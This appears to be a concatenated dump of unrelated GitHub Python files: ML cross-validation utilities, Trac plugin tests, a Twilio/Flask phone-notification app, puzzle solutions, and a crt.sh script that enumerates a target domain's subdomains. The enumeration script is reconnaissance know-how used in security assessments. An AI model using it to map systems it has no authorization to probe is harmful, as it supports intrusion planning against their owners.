in zip(fp_plain[::2], fp_plain[1::2]))\n\nprint(lineToFingerprint(key))\n\n# Public Key\n# python3 SSH_to_FF.py \n# 9g:4f:39:1c:1f:6e:30:6b:gg:44:05:3b:c2:g6:d4:18\n","repo_name":"subedi/scriptbox","sub_path":"SSH_to_FF.py","file_name":"SSH_to_FF.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"80782519","text":"import pytest\n\nfrom crypta.lib.proto.user_data.user_data_stats_pb2 import TUserDataStats\nfrom crypta.lib.python import proto\nfrom crypta.lib.python.yt import schema_utils\nfrom crypta.lib.python.yt.test_helpers import (\n tables,\n tests,\n)\nfrom crypta.lookalike.lib.python.utils.config import config\nfrom crypta.lookalike.proto.yt_node_names_pb2 import TYtNodeNames\nfrom crypta.siberia.bin.common.proto.crypta_id_user_data_pb2 import TCryptaIdUserData\nfrom crypta.siberia.bin.make_id_to_crypta_id.lib.maker.id_to_crypta_id_pb2 import TIdToCryptaId\n\n\npytest_plugins = [\n 'crypta.lib.python.nirvana.test_helpers.fixtures',\n 'crypta.lookalike.lib.python.test_utils.fixtures',\n 'crypta.siberia.bin.common.test_helpers.fixtures',\n]\n\nYT_NODE_NAMES = TYtNodeNames()\n\n\n@pytest.fixture\ndef describe_input():\n crypta_id_user_data = tables.YsonTable(\n file_path='crypta_id_user_data.yson',\n cypress_path=config.FOR_DESCRIPTION_BY_CRYPTAID_TABLE,\n on_write=tables.OnWrite(\n sort_by=['crypta_id'],\n attributes={'schema': schema_utils.get_schema_from_proto(TCryptaIdUserData)},\n row_transformer=proto.row_transformer(TCryptaIdUserData),\n ),\n )\n\n id_to_crypta_id = tables.YsonTable(\n file_path='id_to_crypta_id.yson',\n cypress_path='//home/crypta/production/siberia/id_to_crypta_id',\n on_write=tables.OnWrite(\n sort_by=['id', 'id_type'],\n attributes={'schema': schema_utils.get_schema_from_proto(TIdToCryptaId)},\n ),\n )\n\n user_data_stats = tables.YsonTable(\n file_path='user_data_stats.yson',\n cypress_path='//home/crypta/testing/lab/data/crypta_id/UserDataStats',\n on_write=tables.OnWrite(\n attributes={'schema': schema_utils.get_schema_from_proto(TUserDataStats)},\n row_transformer=proto.row_transformer(TUserDataStats),\n ),\n )\n\n return [\n (crypta_id_user_data, tests.TableIsNotChanged()),\n (id_to_crypta_id, tests.TableIsNotChanged()),\n (user_data_stats, tests.TableIsNotChanged()),\n ]\n\n\n@pytest.fixture\ndef date():\n return '2022-01-19'\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"crypto/test/conftest (82).py","file_name":"conftest (82).py","file_ext":"py","file_size_in_byte":2147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1526563547","text":"import pandas as pd\nimport json\nimport numpy as np\nimport csv\nimport os\nfrom NeuralNetwork import NeuralNetwork as nn\n\ndef get_data_from_txt(csv_file):\n\t#reading dataset from csv\n\tlines = open(csv_file,'r').readlines()\n\n\tinputs = []\n\toutputs = []\n\n\tfor line in lines:\n\t\tline = line[:-1]\n\t\tline_parts = line.split(';')\n\t\tinstance, output = line_parts[0], line_parts[1]\n\n\t\tinputs.append(instance.split(','))\n\t\toutputs.append(output.split(','))\n\n\treturn pd.DataFrame(inputs), pd.DataFrame(outputs)\n\ndef read_file(csv_file, delimiter=None):\n\tlines = []\n\twith open(csv_file) as csv_file:\n\t\tif delimiter is None:\n\t\t\tcsv_reader = csv.reader(csv_file, delimiter=',')\n\t\telse:\n\t\t\tcsv_reader = csv.reader(csv_file, delimiter=delimiter)\n\t\tfor row in csv_reader:\n\t\t\tlines.append(row)\n\n\treturn 
lines\n\ndef parser_network_file(network_file):\n\t#reading lines from the file\n\tlines = read_file(network_file)\n\n\t#assigning the values to corresponding variables with the correct datatypes\n\treg_factor = float(lines[0][0])\n\n\tn_layers = []\n\n\tfor layer in lines[1:]:\n\t\tn_layer = int(layer[0])\n\t\tn_layers.append(n_layer)\n\n\treturn reg_factor, n_layers\n\n\ndef parser_initial_weights_file(initial_weights_file):\n\t#reading lines from the file\n\tlayers = read_file(initial_weights_file, ';')\n\n\tnetwork_weights = []\n\n\t#Iterating over the lines (layers) to catch weights for each neuron\n\tfor layer in layers:\n\t\tlayer_weights = []\n\t\tfor neuron in layer:\n\t\t\t#Splitting each neuron and converting it from string to float\n\t\t\tneuron_weights = neuron.split(',')\n\t\t\tneuron_weights = [float(weight) for weight in neuron_weights]\n\t\t\t#Saving the weights in a new list for each layer\n\t\t\tlayer_weights.append(neuron_weights)\n\n\t\t#saving weights for each layer\n\t\tnetwork_weights.append(layer_weights)\n\n\t#converting network_weights from list of lists to 2D np.arrays\n\tnetwork_weights = [np.array(xi) for xi in network_weights]\n\n\treturn network_weights\n\ndef format_datasets(csv_files):\n\t#removing any pre-existing txt files in the datasets directory\n\tos.system('rm ./datasets/*.txt')\n\n\tfor csv_file in csv_files:\n\t\tif csv_file == 'datasets/wine.data':\n\t\t\t#wine dataset\n\n\t\t\t#reading lines from original csv file\n\t\t\tlines = read_file(csv_file, delimiter=',')\n\n\t\t\t#processing each line to obtain separate files for attributes and outputs.\n\t\t\tfor line in lines:\n\t\t\t\twrite_line_to_csv('datasets/wine_dataset_instances.txt',line[1:], 'a')\n\t\t\t\tif line[0] == '1':\n\t\t\t\t\twrite_line_to_csv('datasets/wine_dataset_classes.txt', ['1.0','0.0','0.0'], 'a')\n\t\t\t\telif line[0] == '2':\n\t\t\t\t\twrite_line_to_csv('datasets/wine_dataset_classes.txt', ['0.0','1.0','0.0'], 'a')\n\t\t\t\telif line[0] == '3':\n\t\t\t\t\twrite_line_to_csv('datasets/wine_dataset_classes.txt', ['0.0','0.0', '1.0'], 'a')\n\n\t\t\t#Combining attributes and outputs files in the desired format.\n\t\t\ta=open('datasets/wine_dataset_instances.txt','r').readlines()\n\t\t\tb=open('datasets/wine_dataset_classes.txt','r').readlines()\n\n\t\t\twith open('datasets/wine_dataset.txt','w') as out:\n\t\t\t\tfor i in range(len(a)):\n\t\t\t\t\tout.write(a[i].rstrip() + ';' + b[i])\n\n\t\t\t#removing temporary files.\n\t\t\tos.system('rm ./datasets/wine_dataset_instances.txt')\n\t\t\tos.system('rm ./datasets/wine_dataset_classes.txt')\n\n
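\t\t# Class labels are written one-hot ('1' -> 1.0,0.0,0.0 and so on) so they\n\t\t# line up directly with the network's output layer.\n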
\t\tif csv_file == 'datasets/pima.tsv':\n\t\t\t#pima dataset\n\n\t\t\t#reading lines from the original tsv file\n\t\t\tlines = read_file(csv_file, delimiter='\t')\n\n\t\t\t#removing the first line (headers)\n\t\t\tlines = lines[1:]\n\n\t\t\tfor line in lines:\n\t\t\t\twrite_line_to_csv('datasets/pima_dataset_instances.txt',line[:-1], 'a')\n\n\t\t\t\tif line[-1] == '1':\n\t\t\t\t\twrite_line_to_csv('datasets/pima_dataset_classes.txt', ['1.0','0.0'], 'a')\n\t\t\t\telif line[-1] == '0':\n\t\t\t\t\twrite_line_to_csv('datasets/pima_dataset_classes.txt', ['0.0','1.0'], 'a')\n\n\t\t\t#Combining attributes and outputs files in the desired format.\n\t\t\ta=open('datasets/pima_dataset_instances.txt','r').readlines()\n\t\t\tb=open('datasets/pima_dataset_classes.txt','r').readlines()\n\n\t\t\twith open('datasets/pima_dataset.txt','w') as out:\n\t\t\t\tfor i in range(len(a)):\n\t\t\t\t\tout.write(a[i].rstrip() + ';' + b[i])\n\n\t\t\t#removing temporary files.\n\t\t\tos.system('rm ./datasets/pima_dataset_instances.txt')\n\t\t\tos.system('rm ./datasets/pima_dataset_classes.txt')\n\n\t\tif csv_file == 'datasets/ionosphere.data':\n\t\t\t#ionosphere dataset\n\n\t\t\t#reading lines from original csv file\n\t\t\tlines = read_file(csv_file, delimiter=',')\n\n\t\t\t#processing each line to obtain separate files for attributes and outputs.\n\t\t\tfor line in lines:\n\t\t\t\twrite_line_to_csv('datasets/ionosphere_dataset_instances.txt',line[:-1], 'a')\n\t\t\t\tif line[-1] == 'g':\n\t\t\t\t\twrite_line_to_csv('datasets/ionosphere_dataset_classes.txt', ['1.0','0.0'], 'a')\n\t\t\t\telif line[-1] == 'b':\n\t\t\t\t\twrite_line_to_csv('datasets/ionosphere_dataset_classes.txt', ['0.0','1.0'], 'a')\n\n\t\t\t#Combining attributes and outputs files in the desired format.\n\t\t\ta=open('datasets/ionosphere_dataset_instances.txt','r').readlines()\n\t\t\tb=open('datasets/ionosphere_dataset_classes.txt','r').readlines()\n\n\t\t\twith open('datasets/ionosphere_dataset.txt','w') as out:\n\t\t\t\tfor i in range(len(a)):\n\t\t\t\t\tout.write(a[i].rstrip() + ';' + b[i])\n\n\t\t\t#removing temporary files.\n\t\t\tos.system('rm ./datasets/ionosphere_dataset_instances.txt')\n\t\t\tos.system('rm ./datasets/ionosphere_dataset_classes.txt')\n\n\ndef write_line_to_csv(csv_file, list_values, mode):\n\twith open(csv_file, mode=mode) as csv_file:\n\t\tcsv_writer = csv.writer(csv_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n\t\tcsv_writer.writerow(list_values)\n\ndef apply_standard_score(df):\n\tfor column in df:\n\t\tdf[column] = (df[column] - df[column].mean())/(df[column].std(ddof=0)+ 0.000001)\n\n\treturn df\n\ndef cross_validation(dataset_name, reg_factor, n_layers, network_weights, inputs,outputs, kfolds, n_cross_val=1):\n\ttotal_accuracies = []\n\ttotal_F1s = []\n\n\tif dataset_name == 'datasets/wine_dataset.txt':\n\t\tunique_class_values = ['1','2','3']\n\telif dataset_name == 'datasets/ionosphere_dataset.txt':\n\t\tunique_class_values = ['good', 'bad']\n\telif dataset_name == 'datasets/pima_dataset.txt':\n\t\tunique_class_values = ['0','1']\n\n\tcsv_file = dataset_name[:-4] + '_' + str(reg_factor) + '_' + str(n_layers) + '-metrics.csv'\n\n\tif not os.path.exists(csv_file):\n\t\t#Building csv file headers line for any number of classes\n\t\theaders_csv = ['cross_val', 'kfold','accuracy']\n\t\theaders_csv += ['class_' + str(unique_class) + '_recall' for unique_class in unique_class_values]\n\t\theaders_csv += ['mean_recall']\n\t\theaders_csv += ['class_' + str(unique_class) + '_precision' for unique_class in unique_class_values]\n\t\theaders_csv += ['mean_precision']\n\t\theaders_csv += ['class_' + str(unique_class) + '_F1' for unique_class in unique_class_values]\n\t\theaders_csv += ['mean_F1']\n\n\t\twrite_line_to_csv(csv_file, headers_csv, 'w')\n\n\tfor cross_val in range(n_cross_val):\n\t\tprint(\"Cross validation # \" + str(cross_val+1))\n\t\tprint(\"----------------------------\")\n\t\taccuracies = []\n\t\tF1s_classes = []\n\n\t\t#Reordering data randomly (outputs not needed because they will be accessed by index)\n\t\tinputs = inputs.reindex(np.random.permutation(inputs.index))\n\n\t\t#Getting unique outputs in the current dataset (resetting index and dropping the old index)\n\t\tunique_outputs = outputs.drop_duplicates().reset_index(drop=True)\n\n\t\t#List containing the separated dataframes for each class.\n\t\tdata_classes = []\n\n
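\t\t# This effectively stratifies the data: fold splits are taken per class\n\t\t# below, so every fold preserves the label distribution.\n\t\t#Iterating over the outputs to separate the inputs in classes.\n\t\tfor 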
index, unique_output in unique_outputs.iterrows():\n\t\t\tclass_indexes = []\n\t\t\tfor index2,output in outputs.iterrows():\n\t\t\t\t#Verifying if the rows are equal between output and unique_output. (3 classes)\n\t\t\t\tif unique_output.shape[0] == 3 and unique_output.eq(output).drop_duplicates().shape[0] == 1:\n\t\t\t\t\tclass_indexes.append(index2)\n\t\t\t\t#Verification for 2 classes\n\t\t\t\telif unique_output.shape[0] == 2 and unique_output.eq(output).drop_duplicates().iloc[0] == True:\n\t\t\t\t\tclass_indexes.append(index2)\n\n\t\t\t#Appending part of the dataframe for the corresponding class_indexes to data_classes\n\t\t\tdata_class = inputs.iloc[class_indexes]\n\t\t\tdata_classes.append(data_class)\n\n\t\tfor kfold in range(kfolds):\n\t\t\tprint(\"Working on kfold \" + str(kfold+1) + \" of \" + str(kfolds))\n\t\t\ttest_data = pd.DataFrame.from_records([])\n\t\t\ttraining_data = pd.DataFrame.from_records([])\n\n\t\t\tfor data_class in data_classes:\n\t\t\t\t#Splitting data into 'kfolds' folds\n\t\t\t\tsplitted_data_class = np.array_split(data_class,kfolds)\n\n\t\t\t\ttest_data_class = splitted_data_class[kfold]\n\t\t\t\ttraining_data_class = pd.DataFrame.from_records([])\n\n\t\t\t\tfor i in range(kfolds):\n\t\t\t\t\tif i != kfold:\n\t\t\t\t\t\ttraining_data_class = pd.concat([training_data_class, splitted_data_class[i]])\n\n\t\t\t\ttest_data = pd.concat([test_data, test_data_class])#.reset_index(drop=True)\n\t\t\t\ttraining_data = pd.concat([training_data, training_data_class])#.reset_index(drop=True)\n\n\t\t\t#Instantiating Neural Network object\n\t\t\tneural_network = nn(reg_factor, n_layers, network_weights, \n\t\t\t\t\t\t\t\t\ttraining_data.reset_index(drop=True), \n\t\t\t\t\t\t\t\t\toutputs.iloc[list(training_data.index)].reset_index(drop=True),\n\t\t\t\t\t\t\t\t\t0.20, 0.9, 0.000005, 800, 50, 200, True, False)\n\n\t\t\t#Fitting the neural network model\n\t\t\tneural_network.backPropagation()\n\n\t\t\t#Performing actual predictions\n\t\t\tpredictions = neural_network.predict(test_data)\n\n\t\t\t#Getting confusion matrix\n\t\t\tcf = getConfusionMatrix(predictions, test_data, outputs, unique_outputs)\n\n\t\t\t#print(cf)\n\n\t\t\t#Getting some metrics from the confusion matrix to validate the model\n\t\t\taccuracy, recalls, precisions, F1s = calcMetrics(cf, unique_outputs)\n\n\t\t\t#Concatenating metrics into a list to be exported to a csv file\n\t\t\tlist_of_metric_values = [cross_val+1, kfold+1] + [accuracy] + recalls + [np.mean(recalls)] + precisions + [np.mean(precisions)] + F1s + [np.mean(F1s)]\n\t\t\t\n\t\t\t#Writing list of metrics computed for the current fold to a csv file.\n\t\t\twrite_line_to_csv(csv_file, list_of_metric_values, 'a')\n\n\t\t\t#Collecting accuracies in order to show this information after cross validation execution.\n\t\t\taccuracies.append(accuracy)\n\t\t\tF1s_classes.append(np.mean(F1s))\n\t\t\ttotal_accuracies.append(accuracy)\n\t\t\ttotal_F1s.append(np.mean(F1s))\n\n\t\tprint(\"Accuracy: \" + str(np.mean(accuracies)) + \" ± \" + str(np.std(accuracies)))\n\t\tprint(\"F1 Measure: \" + str(np.mean(F1s_classes)) + \" ± \" + str(np.std(F1s_classes)))\n\n\tprint(\"---------------------------------------------\")\n\tprint(\"Total Accuracy: \" + str(np.mean(total_accuracies)) + \" ± \" + str(np.std(total_accuracies)))\n\tprint(\"Total F1-measure: \" + str(np.mean(total_F1s)) + \" ± \" + str(np.std(total_F1s)))\n\n\ndef getConfusionMatrix(predictions, test_data, outputs, unique_outputs):\n\tconfusion_matrix = np.zeros((len(unique_outputs), 
len(unique_outputs)), dtype=int)\n\n\tx_val = -1\n\ty_val = -1\n\t\n\tfor index,row in predictions.iterrows():\n\t\tfor index2, unique_output in unique_outputs.iterrows():\n\t\t\tif unique_output.shape[0] == 3:\n\t\t\t\tif unique_output.eq(row).drop_duplicates().shape[0] == 1:\n\t\t\t\t\tx_val = index2\n\t\t\t\tif unique_output.eq(outputs.iloc[index]).drop_duplicates().shape[0] == 1:\n\t\t\t\t\ty_val = index2\n\t\t\telif unique_output.shape[0] == 2:\n\t\t\t\tif unique_output.eq(row).drop_duplicates().iloc[0] == True:\n\t\t\t\t\tx_val = index2\n\t\t\t\tif unique_output.eq(outputs.iloc[index]).drop_duplicates().iloc[0] == True:\n\t\t\t\t\ty_val = index2\n\n\t\tconfusion_matrix[x_val][y_val] += 1\n\n\treturn confusion_matrix\n\ndef calcMetrics(confusion_matrix, unique_outputs):\n\t#Calculating accuracy\n\taccuracy = np.sum(np.diagonal(confusion_matrix)) / np.sum(confusion_matrix)\n\n\t#Calculating recall\n\trecalls = []\n\tfor index, value in enumerate(unique_outputs):\n\t\trow = confusion_matrix[index, :]\n\t\trecall = confusion_matrix[index][index] / row.sum() if row.sum() else 0\n\t\trecalls.append(recall)\n\n\t#Calculating precision\n\tprecisions = []\n\tfor index, value in enumerate(unique_outputs):\n\t\tcolumn = confusion_matrix[:,index]\n\t\tprecision = confusion_matrix[index][index] / column.sum() if column.sum() else 0\n\t\tprecisions.append(precision)\n\n\t#Calculating F1-measure\n\tF1s = []\n\tfor index, value in enumerate(unique_outputs):\n\t\tF1 = 2 * (precisions[index] * recalls[index]) / (precisions[index] + recalls[index]) if (precisions[index] + recalls[index]) else 0\n\t\tF1s.append(F1)\n\n\treturn accuracy, recalls, precisions, F1s\n","repo_name":"ehuarotop/neural-network","sub_path":"Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":12160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15102947724","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# kate: space-indent on; indent-width 4; mixedindent off; indent-mode python;\n\nimport shutil\nimport tempfile\nimport unittest\n\nfrom trac.core import Component, implements\nfrom trac.db.api import DatabaseManager\nfrom trac.perm import PermissionSystem\nfrom trac.ticket.model import Ticket\n#from trac.db.schema import Table, Column, Index\nfrom trac.test import EnvironmentStub, MockRequest\nfrom trac.resource import ResourceNotFound\nfrom trac.web.api import HTTPBadRequest, RequestDone\n\nfrom crashdump.web_ui import CrashDumpModule\nfrom crashdump.model import CrashDump\nfrom crashdump.links import CrashDumpTicketLinks\n\nclass CrashDumpWebUiTestCase(unittest.TestCase):\n def setUp(self):\n self.env = EnvironmentStub(enable=['trac.*', 'crashdump.*'])\n self.env.path = tempfile.mkdtemp()\n self.db_mgr = DatabaseManager(self.env)\n self.env.upgrade()\n #self.db = self.env.get_db_cnx()\n self.crashdump_module = CrashDumpModule(self.env)\n\n def tearDown(self):\n #self.db.close()\n self.env.shutdown()\n shutil.rmtree(self.env.path)\n\n def _create_ticket_with_change(self, old_props, new_props,\n author='anonymous'):\n \"\"\"Create a ticket with `old_props` and apply properties\n in `new_props`.\n \"\"\"\n t = Ticket(self.env)\n t.populate(old_props)\n t.insert()\n comment = new_props.pop('comment', None)\n t.populate(new_props)\n t.save_changes(author, comment=comment)\n return t\n\n def _insert_ticket(self, **kw):\n \"\"\"Helper for inserting a ticket into the database\"\"\"\n ticket = Ticket(self.env)\n for k, v in kw.items():\n ticket[k] = v\n 
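# persist the ticket first, then mirror any requested crash links below\n        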
ticket.insert()\n with self.env.db_transaction as db:\n links = CrashDumpTicketLinks(self.env, ticket, db=db)\n if 'linked_crashes' in kw:\n links.crashes = kw['linked_crashes']\n links.save(author='anonymous', db=db)\n db.commit()\n return ticket, links\n\n def _insert_crashdump(self, **kw):\n \"\"\"Helper for inserting a ticket into the database\"\"\"\n crash = CrashDump(env=self.env)\n for k, v in kw.items():\n crash[k] = v\n crash.insert()\n return crash\n\n def test_no_crash_id(self):\n req = MockRequest(self.env, authname='user', method='GET',\n args={'without-crashid':'42'})\n self.assertRaises(ResourceNotFound,\n self.crashdump_module.process_request, req)\n\n def test_non_existing_crash_id(self):\n req = MockRequest(self.env, authname='user', method='GET',\n args={'crashid':'42'})\n self.assertRaises(ResourceNotFound,\n self.crashdump_module.process_request, req)\n\n def test_action_view_crash(self):\n \"\"\"Full name of reporter and owner are used in ticket properties.\"\"\"\n self.env.insert_users([('user1', 'User One', ''),\n ('user2', 'User Two', '')])\n crash = self._insert_crashdump(reporter='user1', owner='user2')\n req = MockRequest(self.env, authname='user', method='GET',\n args={'crashid':crash.id, 'action': 'view'})\n tmpl, data, extra = self.crashdump_module.process_request(req)\n\n self.assertEqual(tmpl, 'report.html')\n\n\n def test_action_view_crash_child(self):\n \"\"\"Full name of reporter and owner are used in ticket properties.\"\"\"\n self.env.insert_users([('user1', 'User One', ''),\n ('user2', 'User Two', '')])\n crash = self._insert_crashdump(reporter='user1', owner='user2')\n\n for param in ['sysinfo', 'sysinfo_ex', 'fast_protect_version_info', 'exception', 'memory_regions', 'modules', 'threads', 'memory_block', 'stackdump']:\n req = MockRequest(self.env, authname='user', method='GET',\n args={'crashid':crash.id, 'action': 'view', 'params': [param] })\n tmpl, data, extra = self.crashdump_module.process_request(req)\n\n self.assertEqual(tmpl, param + '.html')\n\n def test_action_view_ticket_linked_crash(self):\n \"\"\"Full name of reporter and owner are used in ticket properties.\"\"\"\n self.env.insert_users([('user1', 'User One', ''),\n ('user2', 'User Two', '')])\n crash = self._insert_crashdump(reporter='user1', owner='user2')\n tkt, tkt_links = self._insert_ticket(reporter='user1', owner='user2', linked_crashes='%i' % crash.id)\n\n req = MockRequest(self.env, authname='user', method='GET',\n args={'crashid':crash.id, 'action': 'view'})\n tmpl, data, extra = self.crashdump_module.process_request(req)\n\n self.assertEqual(tmpl, 'report.html')\n self.assertEqual(crash.linked_tickets, [tkt.id])\n\n def test_action_view_ticket_linked_crash_bad_crashid(self):\n \"\"\"Full name of reporter and owner are used in ticket properties.\"\"\"\n self.env.insert_users([('user1', 'User One', ''),\n ('user2', 'User Two', '')])\n tkt, tkt_links = self._insert_ticket(reporter='user1', owner='user2')\n crash = self._insert_crashdump(reporter='user1', owner='user2', linked_crashes='Bad#%i' % tkt.id)\n\n req = MockRequest(self.env, authname='user', method='GET',\n args={'crashid':crash.id, 'action': 'view'})\n tmpl, data, extra = self.crashdump_module.process_request(req)\n\n self.assertEqual(tmpl, 'report.html')\n self.assertEqual(crash.linked_tickets, [])\n\n\ndef test_suite():\n suite = unittest.TestSuite()\n suite.addTest(unittest.makeSuite(CrashDumpWebUiTestCase))\n return suite\n\n\nif __name__ == '__main__':\n 
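# allows running the tests directly: python web_ui.py\n    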
unittest.main(defaultTest='test_suite')\n\n","repo_name":"aroth-arsoft/arsoft-web-crashupload","sub_path":"app/crashdump/tests/web_ui.py","file_name":"web_ui.py","file_ext":"py","file_size_in_byte":5908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"73746480233","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# author : qoolbreeze\n# version 0.1\n\nimport re\nimport requests\nfrom http import HTTPStatus\nimport sys\nfrom argparse import ArgumentParser\n\ndef parse_args() -> ArgumentParser:\n    parser = ArgumentParser()\n    parser.add_argument('-d', '--domain', type=str, required=True, help=\"Target domain.\")\n    parser.add_argument('-o', '--output', type=str, help=\"Path of the output file.\")\n    return parser.parse_args()\n\ndef clear_url(target:str) -> str:\n    return re.sub(r'.*www\\.','',target,1).split('/')[0].strip()\n\ndef save_subdomains(subdomain:str ,output_file:str) -> None:\n    with open(output_file,\"a\") as f:\n        f.write(subdomain + '\\n')\n\ndef main():\n    args = parse_args()\n\n    subdomains = []\n    target = clear_url(args.domain)\n    output = args.output\n\n    req = requests.get(\"https://crt.sh/?q=%.{d}&output=json\".format(d=target))\n\n    if req.status_code != HTTPStatus.OK:\n        print(\"Could not reach crt.sh\")\n        sys.exit(1)\n\n    for value in req.json():\n        subdomains.append(value['name_value'])\n\n    subdomains = sorted(set(subdomains))\n\n    for subdomain in subdomains:\n        print(\"[-] {s}\".format(s=subdomain))\n        if output is not None:\n            save_subdomains(subdomain,output)\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"qoolbreeze/certificate-transparency-subdomains-getter","sub_path":"crt.py","file_name":"crt.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"27635837960","text":"# Josephus problem\nimport sys\nfrom collections import deque\nn,k = list(map(int,sys.stdin.readline().split()))\npeople = [x for x in range(1,n+1)]\npeople = deque(people)\nprint('<',end='')\nwhile people:\n    for i in range(k-1): people.append(people.popleft())\n    print(people.popleft(),end='')\n    if people: print(', ',end='')\nprint('>')","repo_name":"cone26/coding-test","sub_path":"백준/BJ-11866.py","file_name":"BJ-11866.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"30297878010","text":"w, h = [int(i) for i in input().split()]\r\nsave = [ input() for i in range(h)]\r\nentrer = [i for i in save[0].split(' ')]\r\n\r\nrg = len(entrer)\r\n\r\nfor i in range(rg):\r\n    print(entrer[i],end='')\r\n    x,y = i*3,1\r\n    while y < h:\r\n        ok = 0\r\n        if x < w-1 :\r\n            if save[y][x+1] == '-' :\r\n                x += 3\r\n                ok = 1\r\n        if x > 0 :\r\n            if save[y][x-1] == '-' and ok == 0 :\r\n                x -= 3\r\n        y+=1\r\n    print(save[y-1][x])\r\n","repo_name":"ivenwicht2/python-exercice-codingame","sub_path":"ghost-legs.py","file_name":"ghost-legs.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"20441567365","text":"import twilio.twiml\nfrom twilio.rest import TwilioRestClient\nfrom flask import Flask\nfrom flask import request\nfrom flask import redirect\nfrom flask import url_for\nimport requests\n\nimport utils\n\n\napp = Flask(__name__)\napp.config.from_pyfile('config.py')\nutils.init_db()\nutils.make_recordings_directory()\n
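# announcement text for subscribers; set by the /notify webhook when a message\n# starting with the configured PHRASE arrives\nMESSAGE = 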
''\n\n\n@app.route('/')\ndef index():\n return 'go away'\n\n\n@app.route('/api/register', methods=['GET', 'POST'])\ndef register():\n resp = twilio.twiml.Response()\n resp.say('Welcome to the Labor Notifier.', voice='female')\n with resp.gather(numDigits=10, action=url_for('confirm'), method='POST') as g:\n g.say('To register to receive a phone call once the baby is born, please enter your '\\\n 'phone number. Enter the 3 digit area code, followed by the 7 digit number', voice='female')\n return str(resp)\n\n\n@app.route('/api/confirm', methods=['GET', 'POST'])\ndef confirm():\n resp = twilio.twiml.Response()\n digits = request.values.get('Digits', None)\n digits_spaced = ' '.join(ch for ch in digits)\n with resp.gather(numDigits=1, action=url_for('confirm_route', number=digits), method='GET') as g:\n g.say('You entered the number ' + digits_spaced + '. If this is correct, press 1. Otherwise, press 2.')\n return str(resp)\n\n\n@app.route('/api/confirm_route')\ndef confirm_route():\n resp = twilio.twiml.Response()\n digit = request.args.get('Digits', None)\n if digit == '1':\n number = request.args.get('number', None)\n resp.redirect(url=url_for('text_or_call', number=number), method='GET')\n return str(resp)\n else:\n resp.redirect(url=url_for('register'))\n return str(resp)\n\n\n@app.route('/api/text_or_call')\ndef text_or_call():\n resp = twilio.twiml.Response()\n number = request.args.get('number', None)\n with resp.gather(numDigits=1, action=url_for('save_number', number=number), method='GET') as g:\n g.say('If you would like to receive a text message, press 1. If you would like to receive a' \\\n ' phone call, press 2.')\n return str(resp)\n\n\n@app.route('/api/save_number')\ndef save_number():\n resp = twilio.twiml.Response()\n digit = request.args.get('Digits', None)\n number = request.args.get('number', None)\n text = None\n if digit == '1':\n text = True\n elif digit == '2':\n text = False\n else:\n resp.say(digit+' is not a valid choice.')\n resp.redirect(url_for('text_or_call', number=number), method='GET')\n return str(resp)\n number_spaced = ' '.join(ch for ch in number)\n number = '+1' + number\n utils.insert_to_db(number, text)\n resp.say('Thank you. You will receive a notification at that number once the baby is born.', voice='female')\n resp.say('Goodbye.', voice='female')\n resp.hangup()\n return str(resp)\n\n\n@app.route('/notify', methods=['GET', 'POST'])\ndef notify():\n global MESSAGE\n if request.form['Body'].startswith(app.config['PHRASE']):\n MESSAGE = request.form['Body'].replace(app.config['PHRASE'], '')\n client = TwilioRestClient(app.config['SID'], app.config['AUTHTOKEN'])\n numbers = utils.get_all_numbers()\n for number in numbers:\n if number[1] == 0:\n client.calls.create(to=number[0], from_=app.config['NUMBER'],\n url=app.config['URL']+'/api/notify')\n else:\n client.messages.create(to=number[0], from_=app.config['NUMBER'],\n body=MESSAGE)\n resp = twilio.twiml.Response()\n resp.message('Finished notifying all {} numbers'.format(len(numbers)))\n return str(resp)\n return ''\n\n\n@app.route('/api/notify', methods=['GET', 'POST'])\ndef notify_number():\n resp = twilio.twiml.Response()\n resp.say(MESSAGE, voice='female')\n with resp.gather(numDigits=1, action=url_for('record_menu'), method='POST') as g:\n g.say('If you would like to leave a message for the happy couple, please press 1. 
'\\\n 'If you do not wish to leave a message, press 2.', voice='female')\n return str(resp)\n\n\n@app.route('/api/record_menu', methods=['GET', 'POST'])\ndef record_menu():\n digit = request.values.get('Digits', None)\n if digit == '1':\n return redirect(url_for('record'))\n else:\n resp = twilio.twiml.Response()\n resp.say('Thank you. Goodbye.', voice='female')\n resp.hangup()\n return str(resp)\n\n\n@app.route('/api/record', methods=['GET', 'POST'])\ndef record():\n resp = twilio.twiml.Response()\n resp.say('Record your message after the tone. Make sure to state your name, and note '\\\n 'that the recording is only 30 seconds. When done, press the pound sign.', voice='female')\n resp.record(maxLength='30', action=url_for('handle_recording'), finishOnKey='#')\n return str(resp)\n\n\n@app.route('/api/handle_recording', methods=['GET', 'POST'])\ndef handle_recording():\n recording_url = request.values.get('RecordingUrl', None)\n resp = twilio.twiml.Response()\n resp.say('Thank you for leaving a message! Goodbye.', voice='female')\n resp.hangup()\n filename = 'recordings/'+request.values.get('To', None)+'.mp3'\n r = requests.get(recording_url+'.mp3', stream=True)\n with open(filename, 'wb') as fd:\n for chunk in r.iter_content():\n fd.write(chunk)\n return str(resp)\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=app.config['PORT'])\n\n","repo_name":"ThaWeatherman/notify_labor","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":5457,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"72"} +{"seq_id":"20011861568","text":"\nimport curses\nimport app.cli.colors as CLR\nimport logging\nimport time\n\nlogger = logging.getLogger()\n\n\nclass 